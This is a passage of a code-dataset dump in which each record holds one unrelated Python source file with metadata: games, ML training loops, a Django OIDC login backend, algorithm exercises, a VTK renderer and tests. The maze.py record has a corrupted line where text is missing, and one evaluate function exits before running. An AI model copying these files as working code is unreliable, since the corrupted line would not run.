(results[0][1], results[1][1], results[0][1] - results[1][1]))\n if FLAGS.debug:\n print(lines)\n else:\n if results[0][1] > FLAGS.threshold:\n print(\"%.2f\" % results[0][1])\n\n elif FLAGS.action == \"probs\":\n for j, result in enumerate(results):\n\n if FLAGS.debug:\n print(lines[j])\n\n out_str = \"\"\n test_data = result[0]\n probs = 
result[1]\n count = 0\n for i, prob in enumerate(probs):\n if i == 0:\n continue\n\n if FLAGS.debug:\n out_str += \"(%s %.3f) \" % (inverse_dict[test_data[i]], prob*100)\n\n if prob*100 < FLAGS.threshold:\n count += 1\n\n if FLAGS.debug:\n print(out_str)\n\n if count > 0:\n print(\"{:.2f}% words below {:.3f} prob\".format((count/(len(probs) - 1)*100), FLAGS.threshold))\n\n # Whole text processing\n elif test:\n test_perplexity = run_epoch(session, mtest, test_data)\n print(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n tf.app.run()\n\n","sub_path":"word_lm.py","file_name":"word_lm.py","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"186049056","text":"import pygame,sys\nfrom pygame.locals import *\nfrom math import ceil\npygame.init()\nBG = 255,255,255\nvideo_infos = pygame.display.Info()\nheight, width =video_infos.current_h - 20 , video_infos.current_w-30\nmaze=pygame.image.load(\"maze.png\")\nif maze.get_size()[0]ball physics--#\nvx,vy = 0,0\nbounce=0.1\nx , y =30,0\n#!--main loop--#\nFPS=30\ntick=round(1000/FPS)\nwhile True:\n pygame.time.wait(tick)\n #!--shutoff detection--#\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n #!--ball control--#\n keys=pygame.key.get_pressed()\n #!--win detection--#\n \n if x > bound_x and y > bound_y:\n pygame.time.wait(1000)\n screen.fill((0,255,0))\n font = pygame.font.Font('freesansbold.ttf', 32) \n text = font.render('you win', True, (0,0,0) ,(0,255,0)) \n textRect = text.get_rect() \n textRect.center = (width/ 2, height/ 2)\n screen.blit(text,textRect)\n pygame.display.flip()\n pygame.time.wait(2000)\n pygame.quit()\n sys.exit()\n #!--collision detection--#\n elif maze_mask.overlap(ball_mask,((ceil(x+vx),ceil(y+vy)))) != None :\n x-=vx\n y-=vy\n else:\n if keys[K_LEFT]:\n vx-=accel\n if keys[K_RIGHT]:\n vx+=accel\n if keys[K_UP]:\n vy-=accel\n if keys[K_DOWN]:\n vy+=accel\n\n \n #!--friction--#\n if vx!=0:\n vx+= (0-vx)/3\n if vy!=0:\n vy+= (0-vy)/3\n x+=vx\n y+=vy\n \n #!--draw--#\n screen.fill(BG)\n pygame.draw.rect(screen,(0,255,0),(bound_x,bound_y,win_size,win_size))\n screen.blit(ball,(x,y))\n screen.blit(maze,(0,0))\n pygame.display.flip()\n\n \n \n\n","sub_path":"old/stuff/pythonproj/maze/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"36544472","text":"# -*- coding: utf-8 -*-\n# -*- coding: utf-8 -*-\nimport logging\nimport logging.handlers\nimport time\nfrom logging import Logger\n\n\nclass BaseLogger(Logger):\n def __init__(self, path=None):\n super(BaseLogger, self).__init__(self)\n # Log file name\n if path is None:\n from multone.settings import LOG_PATH\n path = LOG_PATH\n filename = path + '/' + str(time.strftime(\"%Y-%m-%d\", time.localtime())) + '.log'\n self.filename = filename\n\n # Create a handler that writes to the log file (one file per day, keeping 30 days of logs)\n fh = logging.handlers.TimedRotatingFileHandler(self.filename, 'D', 1, 30)\n fh.suffix = \"%Y%m%d-%H%M.log\"\n fh.setLevel(logging.WARNING)\n\n # Create another handler that prints to the console\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # Define the output format for the handlers\n formatter = logging.Formatter('[%(asctime)s] %(filename)s[Line:%(lineno)d] [%(levelname)s] %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n # Attach the handlers to the logger\n self.addHandler(fh)\n 
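# The file handler only records WARNING and above while the console handler emits everything down to DEBUG,\n        # so e.g. logger.debug(...) reaches the console only, and logger.warning(...) reaches both the dated log file and the console.\n        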
self.addHandler(ch)\n\n\n","sub_path":"multone/extensions/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"133783952","text":"#-*-coding:utf-8-*-\nimport random\nimport time\n\nfrom action_base import ActionBase\n\nclass Ghost(ActionBase):\n\n # 2 hours\n REST_DURATION = 120 * 60.\n SERIFS = [\n # \"い、入れ替わってる!?\",\n # \"オイラのゴーストが、そう囁くのよ\",\n \"オイラは日本橋の人びとの集合意識から生まれたひとつの人格なのじゃよ\",\n \"オイラは日本橋にいる全員の意識と繋がる事もできるのじゃ!\",\n \"この声は脳に直接響いているのじゃぞ\",\n \"現在、のれんネットワークアップデート中じゃ\",\n ]\n\n def __init__(self, speaker):\n super(Ghost, self).__init__(speaker)\n\n def check(self, data):\n # no one at the entrance, and the wind is swaying\n duration = data[\"now\"] - self._last_running_time\n is_no_one = data[\"tracking\"][0].get(\"status\", 0) == 0\n wind_status = data[\"accelerometer\"].get(\"status\", 0)\n return duration > self.REST_DURATION and is_no_one and wind_status > 0 and random.random() > .3\n\n def run(self, data):\n serif = self.SERIFS[int(random.random()*len(self.SERIFS))]\n self._sp.say(serif)\n time.sleep(1.)\n self._last_running_time = time.time()\n\n return serif\n","sub_path":"python/action/ghost.py","file_name":"ghost.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"338750464","text":"\"\"\"Contains training/validation loops.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tensorflow as tf\nimport gin\nfrom weighpoint import callbacks as cb\nfrom weighpoint.meta import builder as b\n\n\n@gin.configurable\ndef train(\n model_dir, problem, batch_size, epochs, logits_meta_fn, optimizer,\n callbacks=None, verbose=True, checkpoint_freq=None,\n summary_freq=None, save_config=True, lr_schedule=None):\n # need to run in graph mode for reinitializable iterators\n if model_dir is not None:\n model_dir = os.path.expanduser(model_dir)\n datasets = {k: problem.get_dataset(\n split=k, batch_size=None, prefetch=False)\n for k in ('train', 'validation')}\n\n builder = b.MetaNetworkBuilder()\n with builder:\n inputs = builder.prebatch_inputs_from(datasets['train'])\n logits = logits_meta_fn(inputs, problem.output_spec())\n if isinstance(logits, tf.RaggedTensor):\n assert(logits.ragged_rank == 1)\n logits = logits.values\n\n preprocessor = builder.preprocessor()\n model = builder.model((logits,))\n model.compile(\n optimizer=optimizer,\n loss=problem.loss,\n metrics=problem.metrics)\n\n tf.compat.v1.summary.scalar('lr', model.optimizer.lr)\n custom_summary = tf.compat.v1.summary.merge_all()\n\n train_steps = problem.examples_per_epoch('train') // batch_size\n validation_steps = problem.examples_per_epoch(\n 'validation') // batch_size\n\n def preprocess_dataset(dataset):\n num_parallel_calls = tf.data.experimental.AUTOTUNE\n return preprocessor.map_and_batch(\n dataset.repeat(),\n batch_size=batch_size,\n num_parallel_calls=num_parallel_calls).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n datasets = tf.nest.map_structure(preprocess_dataset, datasets)\n\n iters = tf.nest.map_structure(\n tf.compat.v1.data.make_initializable_iterator, datasets)\n\n callbacks, initial_epoch = cb.get_callbacks(\n model,\n callbacks=callbacks,\n checkpoint_freq=checkpoint_freq,\n summary_freq=summary_freq,\n save_config=save_config,\n model_dir=model_dir,\n custom_summary=custom_summary,\n train_steps_per_epoch=train_steps,\n 
val_steps_per_epoch=validation_steps,\n lr_schedule=lr_schedule,\n train_iter=iters['train'],\n val_iter=iters['validation'],\n )\n model.fit(\n iters['train'],\n epochs=epochs,\n verbose=verbose,\n callbacks=callbacks,\n validation_data=iters['validation'],\n steps_per_epoch=train_steps,\n validation_steps=validation_steps,\n initial_epoch=initial_epoch,\n )\n\n\n@gin.configurable\ndef evaluate(\n model_dir, problem, batch_size, logits_meta_fn, optimizer):\n if model_dir is not None:\n model_dir = os.path.expanduser(model_dir)\n dataset = problem.get_dataset(\n split='validation', batch_size=None, prefetch=False)\n\n builder = b.MetaNetworkBuilder()\n with builder:\n inputs = builder.prebatch_inputs_from(dataset)\n logits = logits_meta_fn(inputs, problem.output_spec())\n if isinstance(logits, tf.RaggedTensor):\n assert(logits.ragged_rank == 1)\n logits = logits.values\n\n preprocessor = builder.preprocessor()\n model = builder.model((logits,))\n model.compile(\n optimizer=optimizer,\n loss=problem.loss,\n metrics=problem.metrics)\n\n validation_steps = problem.examples_per_epoch('validation') // batch_size\n\n saver = tf.train.Saver()\n checkpoint = tf.train.latest_checkpoint(model_dir)\n if checkpoint is not None:\n saver.restore(tf.keras.backend.get_session(), checkpoint)\n\n def preprocess_dataset(dataset):\n num_parallel_calls = tf.data.experimental.AUTOTUNE\n return preprocessor.map_and_batch(\n dataset.repeat(),\n batch_size=batch_size,\n num_parallel_calls=num_parallel_calls).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n dataset = preprocess_dataset(dataset)\n exit()\n model.evaluate(dataset, steps=validation_steps)\n","sub_path":"weighpoint/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"174274295","text":"# Example code, write your program here\n# import pandas as pd\n# df = pd.read_csv('data.csv',header=None)\n# print(df)\nimport pandas as pd\nf = pd.read_csv(\"data.csv\")\nkeep_col = ['first_name','last_name','email','gender']\nnew_f = f[keep_col]\nnew_f.to_csv(\"output/output.csv\", index=False)\n\n# f = pd.read_csv(\"output/output.csv\")\n# print(f)\n\n\n","sub_path":"analysis/submissions/e88d1e36c4db7410802b3fda6db81d38_task2-1_1597075724/task2-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507259267","text":"# occurs when a very small absolute number added to a very large abs. 
number\ndx = 1.e-8\nx = 1.e10\n\ncounter = 1000000\n\nfor i in range(counter):\n x += dx\n\nprint (x)\n\ntmp = 0.\n\nfor i in range(counter):\n tmp += dx\n\nx += tmp\n\nprint (x)\n","sub_path":"numerical_errors/information_loss.py","file_name":"information_loss.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85417510","text":"\"\"\"\nThis package contains customisations specific to the Girl Effect project.\nThe technical background can be found here:\nhttps://mozilla-django-oidc.readthedocs.io/en/stable/installation.html#additional-optional-configuration\n\"\"\"\nimport logging\nfrom datetime import datetime\n\nfrom wagtail.core.models import Site\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.core.exceptions import FieldError, SuspiciousOperation\n\nfrom mozilla_django_oidc.auth import OIDCAuthenticationBackend\nfrom molo.profiles.models import UserProfile\n\n\nUSERNAME_FIELD = \"username\"\nEMAIL_FIELD = \"email\"\nSUPERUSER_GROUP = 'product_tech_admin'\nLOGGER = logging.getLogger(__name__)\n\n\ndef _update_user_from_claims(user, claims):\n \"\"\"\n Update the user profile with information from the claims.\n This function is called on registration (new user) as well as login events.\n This function provides the mapping from the OIDC claims fields to the\n internal user profile fields.\n We use the role names as the names for Django\n Groups to which a user belongs.\n :param user: The user profile\n :param claims: The claims for the profile\n \"\"\"\n LOGGER.debug(\"Updating user {} with claims: {}\".format(user, claims))\n data = {\n 'first_name': claims.get(\"given_name\") or claims.get(\"nickname\", \"\"),\n 'last_name': claims.get(\"family_name\", \"\"),\n 'email': claims.get(\"email\", \"\"),\n 'username': user.username,\n 'date_joined': user.date_joined,\n 'is_active': user.is_active\n }\n form = UserChangeForm(instance=user, data=data)\n if form.is_valid():\n user.first_name = \\\n claims.get(\"given_name\") or claims.get(\"nickname\", \"\")\n user.last_name = claims.get(\"family_name\", \"\")\n user.email = claims.get(\"email\", \"\")\n user.save()\n else:\n for e in form.errors:\n raise FieldError(e[0])\n\n username = claims.get(\"preferred_username\", \"\")\n\n # If the user doesn't have a profile for some reason make one\n if not hasattr(user, 'profile'):\n user.profile = UserProfile(user=user)\n\n # TODO: we should be using a more specific site here?\n user.profile.site = Site.objects.get(is_default_site=True)\n\n # Ensure the profile is linked to their auth service account using the uuid\n if user.profile.auth_service_uuid is None:\n user.profile.auth_service_uuid = claims.get(\"sub\")\n\n # If a user already exists with this username\n # change that user's username\n if username:\n for u in User.objects.filter(\n username=username).exclude(pk=user.pk):\n if u.profile and u.profile.auth_service_uuid is None:\n u.username = str(u.profile.site.pk) + '_' + username\n u.save()\n else:\n raise FieldError(\n 'Desired username clashes with user with pk %s whose'\n ' profile has auth_service_uuid' % u.pk)\n user.username = username\n user.save()\n\n # Synchronise a user's profile data\n user.profile.gender = claims.get(\"gender\", \"-\").lower()[0]\n date_of_birth = claims.get(\"birthdate\", None)\n if date_of_birth:\n date_of_birth = datetime.strptime(date_of_birth, \"%Y-%m-%d\").date()\n 
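# The OIDC core spec defines the \"birthdate\" claim as an ISO 8601 YYYY-MM-DD string, hence the strptime format above;\n        # the parsed datetime.date lands on the profile below.\n        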
user.profile.date_of_birth = date_of_birth\n if user.profile.alias is None or user.profile.alias == \"\":\n user.profile.alias = user.username\n elif user.profile.alias != user.username:\n user.profile.alias = user.username\n user.profile.save()\n\n # Synchronise the roles that the user has.\n # The list of roles may contain more or less roles\n # than the previous time the user logged in.\n auth_service_roles = set(claims.get(\"roles\", []))\n wagtail_groups = set(group.name for group in user.groups.all())\n\n # If the user has any role, add the wagtail group equivalent\n # to that role to the user\n if auth_service_roles:\n groups_to_add = auth_service_roles - wagtail_groups\n groups_to_remove = wagtail_groups - auth_service_roles\n for group_name in groups_to_add:\n if group_name == SUPERUSER_GROUP:\n user.is_staff = True\n user.is_superuser = True\n user.save()\n else:\n try:\n wagtail_group = Group.objects.get(name=group_name)\n user.groups.add(wagtail_group)\n except Group.DoesNotExist:\n LOGGER.debug(\"Group {} does not exist\".format(group_name))\n # Remove the user's revoked role\n if user.is_superuser and SUPERUSER_GROUP not in auth_service_roles:\n user.is_superuser = False\n user.save()\n\n for group_name in groups_to_remove:\n try:\n wagtail_group = Group.objects.get(name=group_name)\n user.groups.remove(wagtail_group)\n except Group.DoesNotExist:\n LOGGER.debug(\"Group {} does not exist\".format(group_name))\n\n if not user.is_staff and user.groups.all().exists():\n user.is_staff = True\n user.save()\n\n else:\n user.groups.clear()\n user.is_staff = False\n user.save()\n\n\nclass GirlEffectOIDCBackend(OIDCAuthenticationBackend):\n\n def filter_users_by_claims(self, claims):\n \"\"\"\n The default behaviour is to look up users based on their email\n address. However, in the Girl Effect ecosystem the email is optional,\n so we prefer to use the UUID associated with the user profile (\n subject identifier)\n :return: A user identified by the claims, else None\n \"\"\"\n uuid = claims[\"sub\"]\n try:\n kwargs = {'profile__auth_service_uuid': uuid}\n user = self.UserModel.objects.get(**kwargs)\n # Update the user with the latest info\n _update_user_from_claims(user, claims)\n return [user]\n except self.UserModel.DoesNotExist:\n LOGGER.debug(\"Lookup failed based on {}\".format(kwargs))\n\n \"\"\"\n Users with an existing account will be migrated on their first login so\n we find these users based on their User.id\n \"\"\"\n user_id = claims.get(\"migration_information\", {}).get(\"user_id\", None)\n if user_id is not None:\n try:\n kwargs = {'id': user_id}\n user = self.UserModel.objects.get(**kwargs)\n # Update the user with the latest info\n _update_user_from_claims(user, claims)\n return[user]\n except self.UserModel.DoesNotExist:\n LOGGER.debug(\"Lookup failed based on {}\".format(kwargs))\n\n return self.UserModel.objects.none()\n\n def create_user(self, claims):\n \"\"\"Return object for a newly created user account.\n The default OIDC client create_user() function expects an email address\n to be available. 
This is not the case for Girl Effect accounts, where\n the email field is optional.\n We use the user id (called the subscriber identity in OIDC) as the\n username, since it is always available and guaranteed to be unique.\n \"\"\"\n # If we don't have a username we should break\n username = claims.get(\"preferred_username\")\n email = claims.get(\"email\", \"\") # Email is optional\n # We create the user based on the username and optional email fields.\n\n # If a user already exists with this username\n # change that user's username\n for user in self.UserModel.objects.filter(username=username):\n new_username = str(user.profile.site.pk) + '_' + username\n exists = self.UserModel.objects.filter(\n username=new_username).exists()\n\n can_update = user.profile and not user.profile.auth_service_uuid\n if can_update and not exists:\n user.username = new_username\n user.save()\n else:\n raise FieldError(\n 'Desired username clashes with user with pk %s whose'\n ' profile has an auth_service_uuid' % user.pk)\n\n if email:\n user = self.UserModel.objects.create_user(username, email)\n else:\n user = self.UserModel.objects.create_user(username)\n _update_user_from_claims(user, claims)\n return user\n\n def get_or_create_user(self, access_token, id_token, payload):\n \"\"\"\n Returns a User instance if 1 user is found. Creates a user if not found\n and configured to do so. Returns nothing if multiple users are matched.\n \"\"\"\n\n user_info = self.get_userinfo(access_token, id_token, payload)\n username = user_info.get(\"preferred_username\")\n claims_verified = self.verify_claims(user_info)\n\n if not claims_verified:\n raise SuspiciousOperation('Claims verification failed')\n\n users = self.filter_users_by_claims(user_info)\n\n if len(users) == 1:\n return self.update_user(users[0], user_info)\n\n elif len(users) > 1:\n # In the rare case that two user accounts have the same email,\n # bail. Randomly selecting one seems really wrong.\n raise SuspiciousOperation('Multiple users returned')\n\n elif self.get_settings('OIDC_CREATE_USER', True):\n user = self.create_user(user_info)\n return user\n\n else:\n LOGGER.debug('Login failed: No user with username %s found, and '\n 'OIDC_CREATE_USER is False', username)\n return None\n\n def verify_claims(self, claims):\n \"\"\"\n Verify the provided claims to decide\n if authentication should be allowed.\n \"\"\"\n\n # Verify claims required by default configuration\n scopes = self.get_settings('OIDC_RP_SCOPES', 'openid email')\n if 'preferred_username' in scopes.split():\n return 'preferred_username' in claims\n\n LOGGER.warning(\n 'Custom OIDC_RP_SCOPES defined. 
You need to override'\n ' `verify_claims` for custom claims verification.'\n )\n return True\n\n def verify_token(self, token, **kwargs):\n site = self.request.site\n if not hasattr(site, \"oidcsettings\"):\n raise RuntimeError(\n \"Site {} has no settings configured.\".format(site))\n\n self.OIDC_RP_CLIENT_SECRET = site.oidcsettings.oidc_rp_client_secret\n return super(GirlEffectOIDCBackend, self).verify_token(token, **kwargs)\n\n def authenticate(self, **kwargs):\n if \"request\" in kwargs:\n site = kwargs[\"request\"].site\n if not hasattr(site, \"oidcsettings\"):\n raise RuntimeError(\n \"Site {} has no settings configured.\".format(site))\n\n self.OIDC_RP_CLIENT_ID = site.oidcsettings.oidc_rp_client_id\n self.OIDC_RP_CLIENT_SECRET = \\\n site.oidcsettings.oidc_rp_client_secret\n return super(GirlEffectOIDCBackend, self).authenticate(**kwargs)\n","sub_path":"gem/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"447709598","text":"from typing import List\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n window = []\n res = []\n for i, num in enumerate(nums):\n if window and i - window[0] >= k:\n window.pop(0)\n while window and nums[window[-1]] < num:\n window.pop()\n window.append(i)\n if i >= k - 1:\n res.append(nums[window[0]])\n return res\n \n def maxSlidingWindow2(self, nums: List[int], k: int) -> List[int]:\n if k >= len(nums):\n return [max(nums)]\n \n from collections import deque\n # monotonic queue - decreasing\n q = deque() # element is tuple (index, num)\n res = []\n\n for i, num in enumerate(nums):\n while q and q[-1][1] < num:\n q.pop()\n q.append((i, num))\n if i - q[0][0] + 1 > k:\n q.popleft()\n if i >= k - 1:\n res.append(q[0][1])\n return res\n\n \n\n","sub_path":"239_SlidingWindowMaximum.py","file_name":"239_SlidingWindowMaximum.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"481088951","text":"# 31996\t92\nfrom collections import deque\nfrom sys import stdin\nboard = [0] * 101\ns_count, l_count = map(int, stdin.readline().split())\n\nevents = list(range(101)) # positions after applying snakes and ladders\nfor _ in range(s_count + l_count):\n start, end = map(int, stdin.readline().split())\n events[start] = end\n\ndef bfs(x):\n queue = deque()\n queue.append(x)\n\n while queue:\n a = queue.popleft()\n\n for i in range(1,7): # consider each die roll from 1 to 6\n pos = a + i\n\n if pos > 100: continue # condition 1: must stay on the board\n pos = events[pos] # current position after snakes and ladders\n\n if board[pos] == 0: # condition 2: not visited yet\n board[pos] = board[a] + 1\n queue.append(pos)\n\n return board[100]\n\nprint(bfs(1))\n","sub_path":"w3.BFS/BOJ_16928(뱀과 사다리 게임)/16928_정원.py","file_name":"16928_정원.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"79777247","text":"import textwrap\nfrom pathlib import Path\n\nimport click\nfrom exasol_integration_test_docker_environment.cli.cli import cli\nfrom exasol_integration_test_docker_environment.cli.common import add_options\n\nfrom exaslct_src.exaslct.cli.options.flavor_options import single_flavor_options\nfrom exaslct_src.exaslct.lib.tasks.upload.language_definition import LanguageDefinition\n\n\n@cli.command()\n@add_options(single_flavor_options)\n@click.option('--bucketfs-name', type=str, required=True)\n@click.option('--bucket-name', 
type=str, required=True)\n@click.option('--path-in-bucket', type=str, required=False, default=\"\")\n@click.option('--container-name', type=str, required=True)\ndef generate_language_activation(\n flavor_path: str,\n bucketfs_name: str,\n bucket_name: str,\n path_in_bucket: str,\n container_name: str):\n \"\"\"\n Generate the language activation statement\n \"\"\"\n\n language_definition = \\\n LanguageDefinition(release_name=container_name,\n flavor_path=flavor_path,\n bucketfs_name=bucketfs_name,\n bucket_name=bucket_name,\n path_in_bucket=path_in_bucket)\n\n command_line_output_str = textwrap.dedent(f\"\"\"\n\n In SQL, you can activate the languages supported by the {Path(flavor_path).name}\n flavor by using the following statements:\n\n\n To activate the flavor only for the current session:\n\n {language_definition.generate_alter_session()}\n\n\n To activate the flavor on the system:\n\n {language_definition.generate_alter_system()}\n \"\"\")\n print(command_line_output_str)\n","sub_path":"exaslct_src/exaslct/cli/commands/generate_language_activation.py","file_name":"generate_language_activation.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629722281","text":"# Code Eval - Longes Lines\n# https://www.codeeval.com/open_challenges/2/\n\nimport sys\n\ntest_cases = open(sys.argv[1], 'r')\ntest_cases1 = []\nfor test in test_cases:\n test_cases1.append(test)\n\ntest_cases1.append(\"1\") # chusco D:\nFirst = True\nfor test in test_cases1:\n test = test.strip()\n if First:\n times = int(test)\n lines = []\n finished = \"\"\n First = False\n continue\n if test.isdigit():\n count = 0\n while count != times:\n longest = \"\"\n for line in lines:\n if len(line) > len(longest):\n longest = line\n print(longest)\n lines.remove(longest)\n count = count + 1\n lines = []\n finished = \"\"\n times = int(test)\n continue\n lines.append(test)\n","sub_path":"CodeEval/python/moderate/longest-lines/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243696201","text":"# Volume rendering of Liver data\r\n\r\nfrom vtk import *\r\n\r\nreader = vtkStructuredPointsReader()\r\nreader.SetFileName(\"Liver.vtk\")\r\n\r\n\r\n# Color\r\ncolorTransferFunction = vtkColorTransferFunction()\r\ncolorTransferFunction.AddRGBPoint(0.0, 0.0, 0.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(20.0, 1.0, 0.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(120.0, 1.0, 1.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(180.0, 1.0, 1.0, 1.0)\r\ncolorTransferFunction.AddRGBPoint(255.0, 0.0, 1.0, 1.0)\r\n\r\nvolumeProperty = vtkVolumeProperty()\r\nvolumeProperty.SetColor(colorTransferFunction)\r\n\r\nvolumeProperty.ShadeOn()\r\nvolumeProperty.SetInterpolationTypeToLinear()\r\n\r\nisoFunction = vtkVolumeRayCastIsosurfaceFunction()\r\nisoFunction.SetIsoValue(160.0)\r\n\r\nvolumeMapper = vtkVolumeRayCastMapper()\r\nvolumeMapper.SetVolumeRayCastFunction( isoFunction )\r\nvolumeMapper.SetInputConnection(reader.GetOutputPort())\r\n\r\nvolume = vtkVolume()\r\nvolume.SetMapper(volumeMapper)\r\nvolume.SetProperty(volumeProperty)\r\n\r\n\r\n# Bounding box.\r\noutlineData = vtkOutlineFilter()\r\noutlineData.SetInputConnection(reader.GetOutputPort())\r\noutlineMapper = vtkPolyDataMapper()\r\noutlineMapper.SetInputConnection(outlineData.GetOutputPort())\r\noutline = 
vtkActor()\r\noutline.SetMapper(outlineMapper)\r\noutline.GetProperty().SetColor(0.9, 0.9, 0.9)\r\n\r\n# Set a better camera position\r\ncamera = vtkCamera()\r\ncamera.SetViewUp(0, 0, -1)\r\ncamera.SetPosition(-2, -2, -2)\r\n\r\n# Create the Renderer, Window and Interator\r\nren = vtkRenderer()\r\nren.AddActor(outline)\r\nren.AddVolume(volume)\r\nren.SetBackground(0.1, 0.1, 0.2)\r\nren.SetActiveCamera(camera)\r\nren.ResetCamera()\r\n\r\nrender_window = vtkRenderWindow()\r\nrender_window.AddRenderer(ren)\r\nrender_window.SetWindowName(\"Volume rendering of Liver data\");\r\nrender_window.SetSize(500, 500)\r\n\r\niren = vtkRenderWindowInteractor()\r\niren.SetRenderWindow(render_window)\r\n\r\niren.Initialize()\r\nrender_window.Render()\r\niren.Start()\r\n","sub_path":"exercises/Volume/VolumeIso.py","file_name":"VolumeIso.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635925225","text":"from multiprocessing import Process\nimport pytest\nfrom hypothesis import given, strategy\n\n\n@pytest.fixture(scope='session')\ndef wschat(request):\n def run_wschat():\n from examples.wschat import app\n app.run(port=3002)\n proc = Process(target=run_wschat)\n proc.start()\n request.addfinalizer(proc.terminate)\n\n\nnon_empty_str = strategy(str).filter(bool)\n\n\n@pytest.mark.slow\n@given(uname=non_empty_str, msg=non_empty_str)\ndef test_wschat(browser, wschat, uname, msg):\n browser.visit('http://localhost:3002')\n browser.find_by_id('login-input').type(uname + '\\r')\n browser.find_by_id('chat-input').type(msg + '\\r')\n line1, line2 = browser.find_by_css('.chat-window')[0].text.splitlines()\n assert line1 == \"User '{}' entered chat\".format(uname)\n assert line2.endswith(' {}: {}'.format(uname, msg))\n","sub_path":"tests/test_wschat.py","file_name":"test_wschat.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98733576","text":"\"\"\"python stack_fbanks.py npz7_train/*.npy\n\"\"\"\n\nimport sys\nimport numpy as np\n\nNFRAMES = 7\nb_a = (NFRAMES - 1) / 2\nFRAMES_PER_SEC = 100 # features frames per second\nFEATURES_RATE = 1. 
/ FRAMES_PER_SEC\n\n\ndef h5features_stack_fbanks(fbanks_file, stacked_fbanks_file):\n import h5features\n index = h5features.read_index(fbanks_file)\n files = index['files']\n for f in files:\n times, fbanks = h5features.read(\n fbanks_file, 'features', from_internal_file=f, index=index)\n stacked_fbanks = stack_fbanks(fbanks[f])\n h5features.write(stacked_fbanks_file, 'features', [f],\n [times[f]], [stacked_fbanks])\n\n\ndef stack_fbanks(fbanks, nframes=7):\n fbanks_s = np.zeros((fbanks.shape[0], fbanks.shape[1] * nframes),\n dtype='float32')\n for i in xrange(b_a + 1):\n fbanks_s[i] = np.pad(fbanks[max(0, i - b_a):i + b_a + 1].flatten(),\n (max(0, (b_a - i) * fbanks.shape[1]),\n max(0, ((i+b_a+1) - fbanks.shape[0]) * fbanks.shape[1])),\n 'constant', constant_values=(0, 0))\n for i in xrange(b_a + 1, fbanks.shape[0] - b_a):\n fbanks_s[i] = fbanks[i - b_a:i + b_a + 1].flatten()\n for i in xrange(fbanks.shape[0] - b_a - 1, fbanks.shape[0]):\n fbanks_s[i] = np.pad(fbanks[max(0, i - b_a):i + b_a + 1].flatten(),\n (max(0, (b_a - i) * fbanks.shape[1]),\n max(0, ((i+b_a+1) - fbanks.shape[0]) * fbanks.shape[1])),\n 'constant', constant_values=(0, 0))\n return fbanks_s\n\n\nif __name__ == '__main__':\n for fname in sys.argv[1:]:\n fbanks = np.load(fname)\n fbanks_s = stack_fbanks(fbanks)\n time_table = np.zeros(fbanks_s.shape[0])\n for i in xrange(time_table.shape[0]):\n time_table[i] = float(i) / FRAMES_PER_SEC + FEATURES_RATE / 2\n np.savez(fname.split('.')[0] + '.npz',\n features=fbanks_s,\n time=time_table)\n","sub_path":"abnet/utils/stack_fbanks.py","file_name":"stack_fbanks.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"551568382","text":"import sys\nsys.path.append(\"site-packages\")\nimport requests\nimport json\nimport re\nfrom abc import ABCMeta, abstractmethod\nimport string\nfrom unidecode import unidecode\nfrom urllib import parse\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\n\ntranstable = {ord(c): None for c in string.punctuation}\ndef compare(first, second):\n\treturn unidecode(first.lower()).translate(transtable).replace(' ', ' ') == second\n\nclass AnimeSource:\n\t__metaclass__ = ABCMeta\n\t\n\tdef __init__(self, titleMap, multiSeason, region, proxy):\n\t\tself.name = \"\"\n\t\tself.shows = []\n\t\tself.titleMap = titleMap\n\t\tself.multiSeason = multiSeason\n\t\tself.region 